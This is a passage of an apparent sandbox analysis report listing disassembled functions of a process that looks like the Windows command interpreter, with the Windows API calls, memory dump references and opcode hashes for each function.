                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1623332820-0
                                                                                                                                                                        • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                                                                                                        • Instruction ID: d0acba7e7af0887daf801d4dc27b919591d77bf1a94f0ef43a3c8f548b21199e
                                                                                                                                                                        • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                                                                                                        • Instruction Fuzzy Hash: 28118F22A18746C2DA10EF61A408279BBE0EF89F80F599134DE4E43754DE3EE449C745
                                                                                                                                                                        Function 00007FF6E9435CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1826527819-0
                                                                                                                                                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                        • Instruction ID: 33dcd725dfd6ba19a70528e4b2f2c4f862f578f45f21f12e5bf1576d4c302d1b
                                                                                                                                                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                        • Instruction Fuzzy Hash: 13016132908642CAE700AF65A4443B9BE60FF8A751F445130E94F823A6DF3E904CC70A
                                                                                                                                                                        Function 00007FF6E9433060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9431EA0: wcschr.MSVCRT(?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6E9450D54), ref: 00007FF6E9431EB3
                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6E94292AC), ref: 00007FF6E94330CA
                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF6E94330DD
                                                                                                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E94330F6
                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF6E9433106
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1464828906-0
                                                                                                                                                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                        • Instruction ID: e26a49c189464e09b4f1fc88958a73b3d0ae1077cdee4c8a0abc078360e3db1d
                                                                                                                                                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                        • Instruction Fuzzy Hash: 70310323A08655C3EB24DF75A40827EB660EF59B94F949134DE4AC33D0DE7FA849C30A
                                                                                                                                                                        Function 00007FF6E942CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                        • API String ID: 2221118986-3416068913
                                                                                                                                                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                        • Instruction ID: adc56153d8a4f5a917308771b6521df14ffb690cace7d28b55b40f4fcb9fda6e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3111C223A08642C1EB54CF65E1547B92290AF88BA4F184331EE6DCB7D5DE3ED488C309
                                                                                                                                                                        Function 00007FF6E942BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcschr
                                                                                                                                                                        • String ID: 2$COMSPEC
                                                                                                                                                                        • API String ID: 1764819092-1738800741
                                                                                                                                                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                        • Instruction ID: 3a5bf441f305daf567a70258dc4e0215cee3d97320fecd91dfc8596b65f84f32
                                                                                                                                                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                        • Instruction Fuzzy Hash: 84513823E08642C5FBA59F25A4513792299BF86B84F084031DA4DCB6D6DE7EE84CC74B
                                                                                                                                                                        Function 00007FF6E9432EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4254246844-0
                                                                                                                                                                        • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                                                                        • Instruction ID: 12b563f7c100edb412fb752c3c066078e3a9841c1448a9ce836a221fd10ed234
                                                                                                                                                                        • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                                                                        • Instruction Fuzzy Hash: 76418C23A09742D6EA20DF30E44837967A0EF99B84F548530DE4E87785EE3EE449C70A
                                                                                                                                                                        Function 00007FF6E9435A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1591002910-0
                                                                                                                                                                        • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                        • Instruction ID: c8a2111804c62b25ae75e43f098399c7c2e4dab27355f7f5b984c129ebbbac2a
                                                                                                                                                                        • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                        • Instruction Fuzzy Hash: 63F062B6A19702CBE7148F50E8552787BA0FF8E711B444135C90A83321DE3EA40DCB0A
                                                                                                                                                                        Function 00007FF6E943291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DriveType
                                                                                                                                                                        • String ID: :
                                                                                                                                                                        • API String ID: 338552980-336475711
                                                                                                                                                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                        • Instruction ID: a7bed3ff1cc0aaa4c24b84637877993dfc0e89d169c3b78b9a0e391ea8c7ca19
                                                                                                                                                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AE06D67618641C7E7209FA0E4511AAB7A0FF8D748F841529EA8D83724DF3CD249CB0D
                                                                                                                                                                        Function 00007FF6E9435AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF6E9435B52
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E9434297
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E94342D7
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: memset.MSVCRT ref: 00007FF6E94342FD
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: memset.MSVCRT ref: 00007FF6E9434368
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E9434380
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: wcsrchr.MSVCRT ref: 00007FF6E94343E6
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: lstrcmpW.KERNELBASE ref: 00007FF6E9434401
                                                                                                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6E9435BC7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 497088868-0
                                                                                                                                                                        • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                        • Instruction ID: 63002f12f2f45b4917f73905c18553c902de97b199cf968fb5253802e7cd9eab
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                        • Instruction Fuzzy Hash: B8318222A1C642C2FA24EF31A4547BD6291BF89BC0F445431E94EC7B95DE3EE549C70A
                                                                                                                                                                        Function 00007FF6E9439A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1412018758-0
                                                                                                                                                                        • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                        • Instruction ID: 24e90ddcdf1cbd5e8fc324478c14a78bb300ceec2ecef5aad7b76efbb486a78c
                                                                                                                                                                        • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                        • Instruction Fuzzy Hash: 2AE09203F6A34BD1FF14BFB2684A37812505F18741F081530CD0D85382EE2EA09DC31A
                                                                                                                                                                        Function 00007FF6E942CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                        • Instruction ID: afb262c4e7b4d1f789f5894ebf3d42889458b3332480acb6b90621e7e466b21c
                                                                                                                                                                        • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                        • Instruction Fuzzy Hash: A8F01973E28642C6EB148F15F84067CBBA1FF89B41B589534D90E83365DF3EA449C709
                                                                                                                                                                        Function 00007FF6E9434C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: exit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2483651598-0
                                                                                                                                                                        • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                        • Instruction ID: 1cf6ec1911cf339355e8538ecfa94cb2b605629a0706ab535107191b69e0917c
                                                                                                                                                                        • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                        • Instruction Fuzzy Hash: 91C0803270464AC7EF1CEF7124651BD15545F08301F05543CC907C1382DE2DD40CC709
                                                                                                                                                                        Function 00007FF6E9435508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DefaultUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3358694519-0
                                                                                                                                                                        • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                        • Instruction ID: d724f958552c4f07faf4e14e6cc65a9f9d97669acaec54717c708fa885029cb3
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                        • Instruction Fuzzy Hash: 84E08CA3D08262CAF65C6E71A0493BC2993CF68782FC44031CA0D81A884D2E3849D30E
                                                                                                                                                                        Function 00007FF6E9432E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2221118986-0
